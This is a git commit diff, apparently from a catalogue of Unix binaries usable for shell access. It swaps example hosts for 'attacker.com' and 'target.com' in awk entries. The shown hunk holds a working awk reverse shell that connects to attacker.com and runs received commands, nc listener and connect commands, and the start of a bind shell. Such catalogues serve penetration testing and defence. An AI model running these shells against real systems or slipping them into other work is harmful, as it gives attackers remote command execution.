Use target.com and attacker.com

This commit is contained in:
Emilio Pinna
2018-05-24 20:59:21 +01:00
parent 4bea8d51cc
commit b857c98f92
19 changed files with 58 additions and 58 deletions

View File

@@ -9,14 +9,14 @@ functions:
reverse-shell-non-interactive:
- description: Run `nc -l -p 12345` to receive the shell on the other end.
code: |
RHOST=10.0.0.1
RHOST=attacker.com
RPORT=12345
awk -v RHOST=$RHOST -v RPORT=$RPORT 'BEGIN {
s = "/inet/tcp/0/" RHOST "/" RPORT;
while (1) {printf "> " |& s; if ((s |& getline c) <= 0) break;
while (c && (c |& getline) > 0) print $0 |& s; close(c)}}'
bind-shell-non-interactive:
- description: Run `nc 10.0.0.1 12345` to connect to the shell on the other end.
- description: Run `nc target.com 12345` to connect to the shell on the other end.
code: |
LPORT=12345
awk -v LPORT=$LPORT 'BEGIN {